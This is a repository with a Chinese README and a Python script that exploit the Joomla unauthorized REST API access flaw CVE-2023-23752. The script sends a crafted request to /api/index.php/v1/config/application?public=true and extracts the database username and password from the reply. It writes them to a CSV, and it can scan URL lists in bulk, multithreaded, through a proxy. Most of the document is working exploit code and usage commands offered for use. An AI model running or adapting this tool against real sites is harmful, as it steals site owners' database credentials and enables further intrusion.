├── README.md └── CVE-2023-23752.py /README.md: -------------------------------------------------------------------------------- 1 | ## CVE-2023-23752 2 | Joomla 未授权访问漏洞 CVE-2023-23752 3 | 4 | ## 漏洞描述 5 | Joomla是一款开源的内容管理系统(CMS),使用PHP编写,支持MySQL、MSSQL和PostgreSQL等多种数据库系统。访问限制不当导致未经授权访问服务器REST API接口。 6 | 7 | >受影响版本:Joomla 4.0.0 - 4.2.7 8 | 9 | 10 | ## 使用帮助 11 | ``` 12 | optional arguments: 13 | -h, --help show this help message and exit 14 | -u URL, --url URL 指定url地址 15 | -f FILE, --file FILE 指定文件 16 | -p PROXY, --proxy PROXY 17 | 设置代理,如socks5://127.0.0.1:8080 [clash] 18 | -o OUTPUT, --output OUTPUT 19 | 将结果输出到文件 20 | ``` 21 | 22 | 23 | ## 24 | ``` 25 | # 单个url 26 | python CVE-2023-23752.py -u url 27 | 28 | # 批量扫描,输出存在漏洞的url 29 | python CVE-2023-23752.py -f file.txt -o out_file.csv 30 | 31 | # 使用代理批量扫描 32 | python CVE-2023-23752.py -f file.txt -p socks5://127.0.0.1:8080 33 | ``` 34 | -------------------------------------------------------------------------------- /CVE-2023-23752.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import argparse 4 | import threading 5 | import sys 6 | import re 7 | import time 8 | 9 | 10 | def cmd_line(): 11 | parse = argparse.ArgumentParser( 12 | description="Joomla 未授权访问漏洞 CVE-2023-23752", 13 | usage=''' 14 | python CVE-2023-23752.py -u url 15 | python CVE-2023-23752.py -f file.txt 16 | python CVE-2023-23752.py -f file.txt -o out_file.csv 17 | python CVE-2023-23752.py -f file.txt -p socks5://127.0.0.1:8080 18 | ''', add_help=True) 19 | parse.add_argument('-u', '--url', help="指定url地址") 20 | parse.add_argument('-f', '--file', help="指定文件") 21 | parse.add_argument('-p', '--proxy', help="设置代理,如socks5://127.0.0.1:8080 [clash]") 22 | parse.add_argument('-o', '--output', help="将结果输出到文件", default=str(time.time()) + ".csv") 23 | 24 | if len(sys.argv) == 1: 25 | sys.argv.append('-h') 26 | return parse.parse_args() 27 | 28 | 29 | def poc(url, proxy_server, output_file): 30 | try: 31 | if url[-1:] == '/': 32 | url = str(url).strip('/') 33 | payload = "{}/api/index.php/v1/config/application?public=true".format(url) 34 | header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"} 35 | response = requests.get(url=payload, proxies={"http": proxy_server, "https": proxy_server}, headers=header) 36 | html = response.text 37 | if "password" in html: 38 | print("[+] 漏洞存在![✅]url: {}".format(url)) 39 | pattern = re.compile(r'\{"user":"(.*?)","id":') 40 | username = pattern.findall(html)[0] 41 | print('用户名: ' + username) 42 | pattern = re.compile(r'\{"password":"(.*?)","id":') 43 | password = pattern.findall(html)[0] 44 | print('密码: ' + password) 45 | if output_file: 46 | with open(output_file, 'a', encoding='utf-8') as f: 47 | f.write('{0},{1},{2},{3}\n'.format(url, payload, username, password)) 48 | else: 49 | print("[x] 未检测到漏洞![x] url: {}".format(url)) 50 | except: 51 | print("[!] URL连接失败![!] url: {}".format(url)) 52 | 53 | 54 | def file(url, file, proxy_server, output_file): 55 | with open(file, 'r', encoding='utf-8') as f: 56 | urls = f.readlines() 57 | threads = [] 58 | for url in urls: 59 | t = threading.Thread(target=poc, args=(url.strip(), proxy_server, output_file)) 60 | threads.append(t) 61 | t.start() 62 | 63 | 64 | if __name__ == "__main__": 65 | args = cmd_line() 66 | 67 | if args.file: 68 | file(args.url, args.file, args.proxy, args.output) 69 | else: 70 | poc(args.url, args.proxy, args.output) 71 | --------------------------------------------------------------------------------